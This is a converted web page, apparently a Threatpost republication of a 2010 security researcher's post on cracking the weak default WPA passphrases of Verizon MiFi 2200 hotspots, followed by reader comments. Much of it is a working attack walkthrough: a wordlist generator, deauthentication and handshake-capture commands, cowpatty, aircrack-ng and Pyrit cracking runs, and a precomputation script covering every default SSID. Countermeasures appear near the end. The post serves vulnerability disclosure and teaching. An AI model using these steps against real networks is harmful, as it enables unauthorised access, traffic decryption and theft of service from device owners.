verizon mifi device hacked.pdf
DESCRIPTION
VERIZON MIFI DEVICE HACKED.pdfTRANSCRIPT
SEARCH
10/25/13 3:36 Some @Netgear #routers are exposed to remote authentication bypass &command injection #vulnerabilit ies - http://t.co/v9tSjLWGOh
Welcome > Blog Home > Vulnerabilit ies > Verizon MiFi Device Hacked
CATEGORIES FEATURED PODCASTS VIDEOS
by Joshua Wright February 3, 2010 , 5:11 pm
Related Posts
Some Netgear Routers Open to Remote AuthenticationBypass, Command Injection
October 25, 2013 , 11:09 am
Simple Bug Exposed Verizon Wireless Users’ SMS History
October 21, 2013 , 10:49 am
D-Link Planning to Patch Router Backdoor Bug
October 15, 2013 , 10:19 am
Verizon MiFi 2200 – A Marvelof Engineering
Recently, I picked up a Verizon MiFi device for $50 and the
extension of my service contract for another 2 years. The fun that I’ve
had with the device so far has well made up for both costs.
Background
The MiFi is a battery-powered 802.11b/g AP
slightly smaller than an
iPhone that features an integrated EV-DO
uplink. This device replaced
my former USB EV-DO WAN card*, allowing
me to share the EV-DO
connectivity with multiple devices over WiFi.
It’s been immensely
useful since I commonly travel with 3 laptops, not to mention
VERIZON MIFI DEVICE HACKED
converted by Web2PDFConvert.com
Verizon – We Never Miss anOpportunity to Market
additional mobile devices.
From a security perspective, the MiFi device uses a unique WPA
pre-shared key (PSK) for authentication with the TKIP cipher for
encryption. It’s unclear why the device doesn’t use WPA2-PSK
authentication with the AES-CCMP cipher; perhaps it was a security
trade-off by the manufacturer to maintain the greatest possibility
compatibility with legacy devices that only support WPA-PSK/TKIP.
On the reverse side of the MiFi is a label, identifying the default
SSID and PSK used for authentication. Besides the obvious marketing
angle Verizon gets from including its name in the SSID, this allows the
user to quickly identify and connect to their personal WiFi network to
leverage the EV-DO uplink.
Reconnaissance
Like any good hacker, I turn to the tools that I know to be tried and true. Kismet
is a powerful assessment and evaluation tool for wireless networks,
providing additional insight into the MiFi wireless LAN interface.
Kismet – It’s Like Fate, or Something
Cursory analysis of the beacon information elements don’t reveal
anything particularly interesting, though the Kismet screen-shot gives
us a point of correlation. The MiFi SSID on my product is “Verizon MiFi
DAD1 Secure”, slightly different than that of the MiFi device label
(where Kismet reports the addition of ” Secure” to the SSID, and the
mixed-case “MiFi”, which is important to us).
Also, we can see that the “DAD1″ in the SSID matches the last two
bytes of the AP’s MAC address (or Basic Service Set Identifier -
BSSID). From this we can determine that Verizon has no more than 65,536
unique SSID’s for MiFi devices (potentially less; more data is needed
to determine if all 16-bits of the BSSID are evenly distributed among
devices).
The password on the back of the MiFi device also reveals some
interesting information. From the photo above, the password on my MiFi
device is:
converted by Web2PDFConvert.com
09 11 19 00891
This password value likely breaks down into four fields:
Manufacture Year: “09” represents the 2-character year of manufacture.
Manufacture Month: “11” represents the 2-character month code.
Manufacture Day?: “19” represents the 2-character day code (NB: This could be wrong, one sample had a value of “34″ here, need more data).
Sequential Identifier: “00891” represents the 5-character sequential identifier code.
Based on this assessment, we can determine that the password
selection for the MiFi default is weak. Instead of 11 numeric values
with an effective entropy of approximately 36 bits, the MiFi password
only has an effective entropy of less than 17 bitsfor a given 6-byte prefix. If the concept of a manufacture date-stamp
is true for the 6-byte prefix, then we have a relatively small search
space to find the default MiFi PSK.
Exploitation
Knowing that for a given 6-byte password prefix there are only
100,000 possible passwords, we can get down to exploiting a given MiFi
device. We don’t know how many 6-byte prefixes are in use, but that’s
where YOU THE READER come in. Please let me know what prefixes you see on your individual devices, and I’ll add them to the
attack set.
Talking amongst my wonderful colleagues at InGuardians,
I was able to identify 4 unique manufacture prefixes. Assuming the
target device is one of these values, we can quickly build a dictionary
to attack the PSK selection with a small Python script and a tool such
as coWPAtty or Aircrack-ng:
#!/usr/bin/env pythonimport sys # remove executable namesys.argv.pop(0)if len(sys.argv) == 0: print "Must specify the 6-digit manufacture date (e.g. "091119")." sys.exit(1)for arg in sys.argv: for i in xrange(0,100000): print "%s%05d"%(arg, i)
You can download this source as mifi-passgen.py.
Running this script and redirecting it to a file (e.g.
“./mifi-passgen.py 091118 091119 091120 091121 >mifi-wordlist.txt”)
allows us to pass it to your favorite WPA cracking tool.
Once the wordlist is ready, we need to capture the WPA handshake for
a given client. This is straightforward with Kismet, or a tool like
Airodump-ng. In this example, I’ll use Airodump-ng and Aireplay-ng to
fake a deauthenticate message, forcing the victim to disconnect and
reconnect to the MiFi AP (because I’m an impatient attacker). First,
I’ll start Airodump-ng:
root@bt:~# airmon-ng start wlan0 11 Interface Chipset Driver
converted by Web2PDFConvert.com
wlan0 Atheros ath5k - [phy0] (monitor mode enabled on mon0)wlan0mon Atheros ath5k - [phy0] root@bt:~# airodump-ng --bssid 00:21:E8:B2:DA:D1 -w mifi-dad1 --channel 11 wlan0mon
Next, Aireplay-ng is used to deauthenticate a user. I send 5 deauth
messages, just to make sure the target receives at least one:
root@bt:~# aireplay-ng --deauth 5 -a 00:21:E8:B2:DA:D1 wlan0mon16:53:14 Waiting for beacon frame (BSSID: 00:21:E8:B2:DA:D1) on channel 11NB: this attack is more effective when targetinga connected wireless client (-c ).16:53:14 Sending DeAuth to broadcast -- BSSID: [00:21:E8:B2:DA:D1]16:53:14 Sending DeAuth to broadcast -- BSSID: [00:21:E8:B2:DA:D1]16:53:15 Sending DeAuth to broadcast -- BSSID: [00:21:E8:B2:DA:D1]16:53:15 Sending DeAuth to broadcast -- BSSID: [00:21:E8:B2:DA:D1]16:53:16 Sending DeAuth to broadcast -- BSSID: [00:21:E8:B2:DA:D1]
Returning to the Airodump-ng window, we can see that it has observed
a WPA handshake, identifying the MAC address of the MiFi AP. Terminate
the Airodump-ng session by issuing “CTRL+C”.
WPA Handshake – No Limp Fish
With the Airodump-ng packet capture file mifi-dad1-01.cap, and the
dictionary file containing the potential passwords for the target MiFi
device, we can implement the WPA/WPA2 brute-force dictionary attack
using coWPAtty:
root@bt:~# cowpatty -r mifi-dad1-01.cap -f mifi-wordlist.txt -s "Verizon MiFi2200 DAD1 Secure"cowpatty 4.6 - WPA-PSK dictionary attack. Collected all necessary data to mount crack against WPA/PSK passphrase.Starting dictionary attack. Please be patient. The PSK is "09111900891". 892 passphrases tested in 4.60 seconds: 193.97 passphrases/second
… or Aircrack-ng.
root@bt:~# aircrack-ng mifi-dad1-01.cap -w mifi-wordlist.txt
converted by Web2PDFConvert.com
Key Found, Conveniently Enough
This is fun and evil and all, but we can get even more evil, can’t we?
Exploitation (with 100% more Evil)
We know that WPA/WPA2-PSK networks are vulnerable to offline
dictionary attacks, despite the efforts of the IEEE 802.11 committee to
thwart the attack by reducing the speed of password guessing.
Manipulating this mechanism, tools such as coWPAtty’s “genpmk” and
Aircrack-ng’s “Airolib-ng” spend up-front time precomputing all the
possible key guesses in a dictionary file, accelerating the cracking
time when the attack is implemented. A limiting factor in this
precomputation attack is that all the password guesses need to be
computed for each unique SSID.
Recall that the MiFi SSID is in the form “Verizon MiFi2200 ????
Secure”, where the SSID is the same for each device with the exception
of the 4 ASCII characters representing last 2 bytes of the wireless
BSSID. With only 2 bytes difference between each SSID, there is a limit
of 65,536 potential SSID’s.
Using the WPA/WPA2-PSK precomputation attack, we can precompute the
password guesses based on the manufacture date and sequential
identifier for each of the 65K SSID’s. Once this is precomputed, it
becomes possible to recover the password for any default MiFi
configuration in a matter of seconds.
Leveraging standard host CPU’s, it might take a long time to
precompute all the password guesses for each of the 65K SSID’s.
Fortunately, we aren’t constrained to the speed of common CPU’s.
While coWPAtty and Aircrack-ng made strides in improving the speed
of attacking WPA/WPA2-PSK networks, they pale in comparison to the
excellent work of Lukas Lueg and the Pyrit project.
Pyrit leverages both the performance of standard CPU’s for precomputing
password guesses for PSK networks, as well as the impressive computing
power of video accelerators, including the Nvidia CUDA line.
If we assume there are 12 manufacture date prefixes, we are left
with a password list of 1.2 million entries. Computing all the possible
password hashes for each of the 65K SSID’s on a Core2Duo 2.5 GHz SSE2
would take almost two years to complete. Leveraging 4 GeForce 295 CUDA
cards on a single host would require only 10.2 days.
With the database capabilities added to Pyrit, we can get this attack setup fairly easily. After installing Pyrit (getting the source from
SVN and installing sqlalchemy described here),
we need to configure Pyrit to use a database for storage. I’m using
converted by Web2PDFConvert.com
sqlite in this example by editing the ~/.pyrit/config file as shown:
#default_storage = file://# Change this path to an appropriate one for your filesystemdefault_storage = sqlite:////Users/josh/hack/MiFi-PSK/mifi-psk.dbrpc_announce = truerpc_announce_broadcast = falserpc_knownclients =rpc_server = true
Once the sqlite database storage reference is set, we can create all 65K MiFi SSID’s using a simple Python script:
#!/usr/bin/env pythonimport cpyrit.storage store = cpyrit.storage.getStorage('sqlite:///mifi-psk.db')for i in xrange(0,256): for j in xrange(0,256): essid = "Verizon MiFi2200 %02X%02X Secure"%(i,j) store.essids.create_essid(essid) print "Created %s"%essid
You can download this source as pyrit-mifi-ssids.py. Change to the directory path you established in the Pyrit config file, then
create the SSID’s for Pyrit:
$ cd /Users/josh/hack/MiFi-PSK$ ./pyrit-mifi-ssids.pyCreated Verizon MiFi2200 0000 SecureCreated Verizon MiFi2200 0001 SecureCreated Verizon MiFi2200 0002 SecureCreated Verizon MiFi2200 0003 Secure...Created Verizon MiFi2200 FFFF Secure
Once the SSID’s have been loaded, we can load the passwords into the Pyrit database as well. Returning to the mifi-passgen.py
script, we can pipe the output directly to Pyrit, as shown.
$ ./mifi-passgen.py 091118 091119 091120 091121 | pyrit -i - import_passwordsPyrit 0.2.5-dev (svn r209) (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.comThis code is distributed under the GNU General Public License v3+ Connecting to storage at 'sqlite:////Users/josh/hack/MiFi-PSK/mifi-psk.db'... connected. 400000 lines read. Flushing buffers.... ...All done.
Next, we allow Pyrit to precompute the passphase guesses for us, leveraging the available CPU and offload capabilities:
$ pyrit batchPyrit 0.2.5-dev (svn r209) (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.comThis code is distributed under the GNU General Public License v3+ Connecting to storage at 'sqlite:////Users/josh/hack/MiFi-PSK/mifi-psk.db'... connected. Working on ESSID 'Verizon MiFi2200 4109 Secure'Processed 2/256 workunits so far (0.8%); 480 PMKs per second....
The great part is that this only needs to be done once. It could
take days or weeks depending on your available hardware, but once it is
complete, it can be used by anyone to recover the default password on
any MiFi device.
converted by Web2PDFConvert.com
To leverage the Pyrit database, we can use the “attack_db” option with our packet capture, as shown.
$ pyrit -r mifi-dad1-01.cap attack_dbPyrit 0.2.5-dev (svn r209) (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.comThis code is distributed under the GNU General Public License v3+ Connecting to storage at 'sqlite:////Users/josh/hack/Mifi-PSK/mifi-psk.db'... connected. Parsing file 'mifi-dad1-01.cap' (1/1)...8816 packets (8816 802.11-packets), 1 APs Picked AccessPoint 00:21:e8:b2:da:d1 ('Verizon MiFi2200 DAD1 Secure') automatically.Attacking handshake with Station 00:1c:b3:b8:76:6c...Tried 57504 PMKs so far (57.4%); 107722 PMKs per second.. The password is '09111900891'.Impact
Using this technique, an attacker can recover the default password
from any MiFi device. The impact of this attack can vary, but three
immediate concerns come to mind:
Utilization Fees: Verizon limits users to 5 GBdata transfer a month over EV-DO account; exceeding this watermarkracks up significant fees for the end-user. A neer-do-well couldcompromise a MiFi device and leverage it for their download purposes,potentially avoiding racking up their own Internet use charges, or justto cause trouble for the victim.
Client Attack: For organizations deploying MiFidevices for their road-warriors, an attacker may compromise the PSK onthe MiFi wireless interface for the opportunity to exploit the clientdevices using the network interface. This may be in an effort to gainaccess to a system over a weak network interface, allowing them toreturn to their more secure network to attack other internal hosts.
Traffic Decryption: If an attacker can identifythe correct PSK for the MiFi network, then they can also decrypt allthe traffic on the network with Wireshark or Airdecap-ng.This could be used to passively collect sensitive information, or toactively exploit the client browser or other network traffic.
Countermeasures
Fortunately, there are a couple of options available to us to mitigate this attack.
Change the Default PSK: Before deploying the MiFidevice, be sure to change the PSK to a non-default value. The IEEE802.11-2007 specification reads “A key generated from a passphrase ofless than about 20 characters is unlikely to deter attacks.”; I thinkthis is good advice.
Change the Default SSID: Change the default SSIDfrom “Verizon MiFi2200 XXXX Secure” to another value that is notcommon, but not unique either (somewhere in the middle) to mitigateprecomputed PSK attacks, as well as general wireless anonymity attacks.
Enteprise organizations and end-users alike should apply both these
recommendations to thwart attacks against the MiFi deficiency in
password selection, as well as weaknesses in WPA/WPA2-PSK in general.
Conclusion
The Verizon MiFi is a great tool, but the engineering team who
created the default password mechanism should have taken into
consideration the limited entropy in the selection of passwords, and
the well-publicized attacks against WPA-PSK networks to limit customer
exposure. Coincidentally, this is a topic we examine in my SANS Institute Ethical Hacking Wireless course,
converted by Web2PDFConvert.com
13 Categories: Vulnerabilit ies
where we dig into a variety of wireless systems including WiFi,
Bluetooth, WiMAX, GSM, proprietary protocols and more. If you are
interested in wireless security topics, I recommend you check out the course sample or sign right up for the biggest SANS
conference of the year in Orlando, FL, March 8th – 13th.
Joshua Wright is a SANS instructor and security consultant at InGuardians. This essay originally appeared on his blog, Will HackFor Sushi.
Comments (13)
Anonymous February 3, 2010 @ 6:30 pm
Anonymous February 3, 2010 @ 7:06 pm
Space Rogue February 3, 2010 @ 7:07 pm
Anonymous February 3, 2010 @ 7:30 pm
Anonymous February 3, 2010 @ 7:32 pm
The number is the ESN for the CDMA chip.
1
Ah, but aren’t the SSID’s just that by default, but completely user-settable? They are on the Sprint version; you can’t
possibly tell the difference between my MiFi and a dozen other home routers you’ll find in my neighborhood.
2
This hack was published like two weeks ago. Where have you been.
http://evilpacket.net/2010/jan/14/mifi-geopwn/
Conclusion reads like an Ad for your SANS course, make me wonder why you stole this advisory in the first place.
- SR
3
pwnd^
4
5
converted by Web2PDFConvert.com
Anonymous February 3, 2010 @ 7:51 pm
Not Space Rogue February 3, 2010 @ 9:22 pm
Anonymous February 4, 2010 @ 5:32 pm
Anonymous February 4, 2010 @ 7:20 pm
Anonymous February 4, 2010 @ 9:17 pm
George Carey February 5, 2010 @ 10:58 pm
Space Rogue: that’s a totally different attack, you fool…
Nice informative post! Especially the part about the entropy and CUDA.6
You are wrong. Try reading both. The evilpacket mifi geopwn attack is against the administration web application and
exploits the combination of weak authentication and no CSRF protection. This is a network attack against the weak selection
of preshared keys.
7
We just bought one a few days ago. My colleague who configured it tells me that it has WPA2 AES available.
8
Excellent article!
For your records, the 6-digit on my MiFi’s password is 091135.
9
The code is the ESN of the device, as noted by another commenter. the first three characters of the Decimal ESN are the
Manufacturer’s code, assigned to Novatel. Thus you can assume the first three characters are always 091. The remaining 8
characters are a unique identifier for that handset within the given manufacturer range.
http://en.wikipedia.org/wiki/Electronic_Serial_Number
10
My MIFI2200 supports WPA2-AES. That and a long passphrase makes it fairly safe.
Plus, it’s only Internet access. If you’re using it for corporate communications you probably have a VPN running on top of it.
11
converted by Web2PDFConvert.com
ROCKYROAD February 23, 2010 @ 5:14 am
rcmichelle August 25, 2010 @ 2:49 am
Comments are closed.
Recommended Reads
October 25, 2013 , 11:09 amCategories: Vulnerabilit ies, Web Security
0
Read more...
Some Netgear Routers Open to Remote Authentication Bypass, Command Injectionby Dennis Fisher
There is a vulnerability in some Netgear wireless routers that allows a remote attacker to
So the exposure would be limited to exploiting the client(s) only after obtaining the key.
last six pw on my 2200:
928204
12
you can try to google Password Genius
13
converted by Web2PDFConvert.com
Top Stories
Some Netgear Routers Open to Remote Authentication Bypass, Command Injection
October 25, 2013 , 11:09 am
Experian Caught Selling Data to Identity Theft Service
October 21, 2013 , 4:29 pm
Threatpost News Wrap, October 18, 2013
October 18, 2013 , 1:35 pm
NETGEAR ReadyNAS Storage Vulnerable to Serious Command-Injection Flaw
October 22, 2013 , 4:18 pm
DDoS, Other Attack Traffic from Asia-Pacific Up in Q2
October 16, 2013 , 4:04 pm
Apache Struts Update Fixes Two Vulnerabilit ies
October 18, 2013 , 1:24 pm
Yahoo Should Consider SSL a Minimal Security, Privacy Standard for Email
October 17, 2013 , 7:32 am
October 21, 2013 , 10:49 am
9
Categories: Social Engineering, Vulnerabilit ies, WebSecurity
Read more...
Simple Bug Exposed Verizon Wireless Users’ SMS Historyby Dennis Fisher
A security researcher discovered a simple vulnerability in Verizon Wireless’s Web-based customer portal that enabled anyone who knows a subscriber’s phone numberto download that user’s SMS message history, including the numbers of the people he communicated with.
October 15, 2013 , 10:19 amCategories: Vulnerabilit ies
1
Read more...
D-Link Planning to Patch Router Backdoor Bugby Dennis Fisher
D-Link is in the process of developing a patch for a serious security vulnerability in some of its older routers that essentially functions as a backdoor.
converted by Web2PDFConvert.com
The Final Say
Read more…
Hi folks, from Cartagena, Colombia! You may be puzzled why this particular city in South America suddenly became the safest on the planet… Read on… But first:
Ohhh how HOT it is here, but ...
Read more…
A new ransomware Trojan is on the loose. The attackers give you roughly three days to pay them, otherwise your data is gone forever.
Read more…
In most cases, the “free” Android applications you download from Google’s Play store aren’t free at all. These developers aren’t just developing apps for you out of the
kindness of t...
New Ransomware Scam Accepts Bitcoin Payment
October 21, 2013 , 11:31 am
Phone Hack Could Block Messages, Calls on Some Mobile Networks
August 26, 2013 , 3:43 pm
From Kaspersky Blogs
THE SAFEST CITY IN THE WORLD....
BLOG: CRYPTOLOCKER WANTS YOUR MONEY!
WHAT’S THE DEAL WITH ADWARE ON ANDROID?...
converted by Web2PDFConvert.com
Read more…
Kurt Baumgartner, targeted attack expert and the principle security researcher at Kaspersky Lab, sat on a panel discussing how the global market for trafficking
financial information has changed, how ...
Read more…
Eugene Kaspersky receives honorary doctorate and discusses viruses and cyber threats in Armenia During his recent visit to Armenia, Eugene Kaspersky, CEO of
Kaspersky Lab, received an honorary ...
Newsletter Sign-up RSS Feeds Home About Us Contact Us
The Kaspersky Lab Security News Service
CATEGORIES
Apple | Cloud Security | Compliance | Critical Infrastructure | Cryptography | Data Breaches | Featured | Featured Podcast |Featured Video | Government | Hacks | Holiday Scams | Malware | Microsoft | Mobile Security | Podcasts | Privacy |Slideshow | SMB Security | Social Engineering | Uncategorized | Videos | Virtualization | Vulnerabilities | Web Security
AUTHORS
Dennis Fisher
Michael Mimoso
Christopher Brook
Brian Donohue
Anne Saita
Copyright © 2013 Threatpost - English - Global - threatpost.com | Terms of Service |Privacy
ADDRESSING THE GLOBAL TRAFFICKING OF FINANCIAL DAT...
EUGENE KASPERSKY RECEIVES HONORARY DOCTORATE IN AR...
converted by Web2PDFConvert.com